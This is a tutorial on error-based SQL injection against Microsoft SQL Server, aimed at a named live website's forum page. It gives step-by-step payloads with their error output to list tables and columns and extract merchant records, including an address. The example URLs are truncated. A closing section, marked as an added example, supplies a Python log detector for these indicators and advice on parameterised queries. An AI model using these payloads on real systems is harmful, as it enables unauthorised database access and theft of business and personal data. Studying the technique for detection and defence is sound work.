CHECK VULN OR NOT !!!
=====================
Check whether it can be injected or not by adding a ' at the end of the URL
http://www.gamexus.com/mai
If the error looks like this :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56
Microsoft OLE DB Provider (SQL Server Driver) <---- This is the key part !!!
Apart from the SQL Server Driver (Provider) I wouldn't know
so let's continue ...
FIND THE TABLE STRUCTURE !!!
============================
1) Debugging
Debugging here means making MsSQL show its error message.
The SQL injection is "and 1="
2) Bring up the table name
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables)
http://www.gamexus.com/mai
The error that appears is :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56
You can see there that we get a table named "Merchants".
Unlike MySQL, MsSQL distinguishes data types in its output, so we need to convert the value so that SQL produces the error message we want.
Now we look for the next table.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56
You can see the query differs from MySQL. MySQL doesn't support "not in" while MsSQL does support "not in" ^^
So we got a table named "category" .... let's try to find the next table.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56
Got a table named "Codes". Feel free to keep looking for the table names you want.
FIND THE COLUMN STRUCTURE !!!
=============================
For example, we want to find the columns in the "Merchants" table.
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56
Got a column named "merchantId" ... let's look for other columns
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56
Got the column "address". Let's look for another column ...
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56
Got the column "merchantName" hehehe ....
Feel free to keep looking if you want ^^
DATA RETRIEVAL !!!
==================
For example, we want to see the contents of the columns "merchantid, address, merchantName" in the "Merchants" table.
Query : and 1=convert(int,(select top 1 merchantid from merchants))--
http://www.gamexus.com/mai
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56
Got "merchantid" = "alohacc".
So how do we pull the contents of the columns all at once ??
Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress
Error that appears :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56
Note : %2b = + while ':' = the separator
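The defender-side counterpart to the technique above, as an added example that is not part of the original post: a small Python detector that scans web-log lines for the request-side indicators used here (convert(int,(select ...)), information_schema enumeration, the "and 1=" prefix, the "--" trailer) and for the ODBC error ids 80040e14/80040e07 leaking into responses. The log format, the parameter name "id" and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators of the error-based MsSQL technique in this post: a convert(int, ...)
# wrapped around a subquery, information_schema enumeration, the "and 1=" prefix, the "--" trailer.
INDICATORS = {
    "convert_subquery": re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)\b", re.I),
    "and_1_equals": re.compile(r"\band\s+1\s*=", re.I),
    "comment_trailer": re.compile(r"--\s*$"),
}
# Response-side signature: the ODBC error ids quoted in the post, which only reach the client
# when detailed ASP/ODBC errors are sent to users instead of a generic error page.
LEAKED_ERROR = re.compile(r"80040e(07|14)", re.I)

def decode_query(url):
    """Return the URL-decoded query string ('' when none); %2b becomes '+', as in the post."""
    _, _, query = url.partition("?")
    return unquote_plus(query)

def classify_request(url):
    """Return the indicator names matched by one request URL."""
    q = decode_query(url)
    return [name for name, rx in INDICATORS.items() if rx.search(q)]

def scan_log(lines):
    """Return (line_no, indicators) for each suspicious line.
    Line format is a constructed 'METHOD URL STATUS [response-excerpt]', not a real W3C log."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue
        found = classify_request(parts[1])
        if len(parts) == 4 and LEAKED_ERROR.search(parts[3]):
            found.append("db_error_leaked")
        if found:
            hits.append((n, found))
    return hits

# Constructed sample log; the parameter name "id" is an assumption (the post's URLs are truncated).
SAMPLE_LOG = [
    "GET /main/ListPosts.asp?id=12 200",
    "GET /main/ListPosts.asp?id=12' 500 ODBC Drivers error '80040e14' Unclosed quotation mark",
    "GET /main/ListPosts.asp?id=12%20and%201=convert(int,(select%20top%201%20table_name%20from"
    "%20information_schema.tables%20where%20table_name%20not%20in%20('Merchants')))-- 500 error '80040e07'",
    "GET /main/ListPosts.asp?id=12%20and%201=convert(int,(select%20top%201%20merchantid%20from%20merchants))-- 500 error '80040e07'",
]
```

A "db_error_leaked" hit on its own (line 2 of the sample) already shows the root cause: the page returns raw driver errors, so the lasting fix is parameterised queries plus a generic error page, with the detector left in place to catch attempts.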